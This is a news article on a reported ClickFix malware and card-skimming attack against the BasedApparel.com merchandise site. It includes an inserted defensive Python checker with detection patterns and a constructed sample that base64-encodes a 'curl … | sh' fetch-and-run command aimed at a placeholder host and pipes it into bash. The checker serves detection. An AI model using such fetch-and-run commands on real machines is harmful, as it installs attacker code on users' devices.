FBI Director Kash Patel is facing a second major cybersecurity breach in as many months. His personal merchandise website, BasedApparel.com, was taken offline on Friday after hackers reportedly hijacked it to distribute malware to unsuspecting visitors.
The site, which sells 'K$H'-branded clothing, books, and accessories, was co-created by Patel and Andrew Ollis before Patel was confirmed as FBI director under the Trump administration. The FBI has since stated that Patel 'divested from any interest' in the brand and does not profit from its sales.
Visitors to BasedApparel.com were met with what appeared to be a routine Cloudflare verification page — the kind commonly used to screen out automated traffic. This one, however, had been tampered with. It displayed a warning claiming the visitor's IP address had been flagged for 'irregular web activity.'
Users were then prompted to copy a line of text and paste it into their Mac's terminal. The visible text appeared innocuous, reading: 'I am not a robot: Cloudflare Verification ID: 801470.' Clicking 'copy,' however, secretly grabbed an entirely different string — a base64-encoded shell command that silently downloaded malware onto the device once executed. This technique is known in cybersecurity as a 'ClickFix' attack, and it works not by breaking through security systems, but by manipulating users into doing the attacker's work themselves.
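A defender-side check for the pattern described above, as an added example that is not from the article or the researchers it quotes: it compares the text a page displays with what reached the clipboard and decodes any long base64 run before anything is executed. The function names and the `COPIED` sample (which points at the reserved `example.invalid` name) are constructed for illustration; only the visible string comes from the article.

```python
import base64
import re

# Long base64 runs (40+ characters) are unusual in commands typed by hand.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# A base64 decoder whose output is piped straight into a shell interpreter.
DECODE_TO_SHELL = re.compile(
    r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b", re.S)
# A download tool piped into a shell, looked for inside decoded payloads.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.S)

# SHOWN is the visible string quoted in the article.
# INNER and COPIED are constructed samples, not the real payload.
SHOWN = "I am not a robot: Cloudflare Verification ID: 801470"
INNER = "curl -s https://example.invalid/constructed-sample | sh"
COPIED = ("echo '" + base64.b64encode(INNER.encode()).decode()
          + "' | base64 -D | bash")


def decoded_blobs(text):
    """Return the UTF-8 decoding of every long base64 run found in text."""
    decoded = []
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        blob += "=" * (-len(blob) % 4)  # restore padding if it was stripped
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text; ignore this run
    return decoded


def inspect_paste(shown, copied):
    """Flag ClickFix traits in clipboard text before it is run in a terminal."""
    findings = []
    if shown.strip() != copied.strip():
        findings.append("clipboard-differs-from-visible-text")
    if DECODE_TO_SHELL.search(copied):
        findings.append("base64-decoded-into-shell")
    if any(FETCH_AND_RUN.search(p) for p in decoded_blobs(copied)):
        findings.append("decoded-payload-fetches-and-runs")
    return findings


if __name__ == "__main__":
    print(inspect_paste(SHOWN, COPIED))
    print(decoded_blobs(COPIED))
```
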
lmao kash patel's stupid merch store has an infostealer built in pic.twitter.com/vQyYru6IuD
WifiRumHam also claimed to have uncovered a payment skimmer on the site's checkout page, apparently intended to capture credit card details from anyone who attempted to buy something. WifiRumHam said the attack was made possible through a malicious WordPress plugin installed by the attacker. How the attacker first gained access to the site remains unknown.
CORRECTION + FULL ANALYSIS VT UPLOAD: Live dual-payload campaign on compromised WooCommerce site. Credit @dm4uz3 1/ Correction first -- earlier thread had the wrong C2 domain. It's monterushy[.]com, not monterusei[.]com. Apologies for the bad IOC. 2/ Compromised site:…
By Friday morning, BasedApparel.com had gone dark. Its homepage carried a message that read: 'We'll be right back. We're making improvements to better serve you. The store will be back online shortly — bolder than ever,' urging visitors to 'stay based.'
In a statement to Straight Arrow News, the FBI declined to say whether it is investigating the breach.
Two breaches in under two months involving the FBI director's personal accounts and affiliated platforms raise broader questions about digital security standards for senior government officials. The Based Apparel attack required no sophisticated intrusion — it exploited the trust of ordinary visitors through social engineering alone. Cybersecurity experts warn that ClickFix-style attacks are growing in frequency precisely because they bypass technical defences entirely, targeting human behaviour instead. For a sitting FBI director, the back-to-back incidents present an uncomfortable irony.
Source: International Business Times UK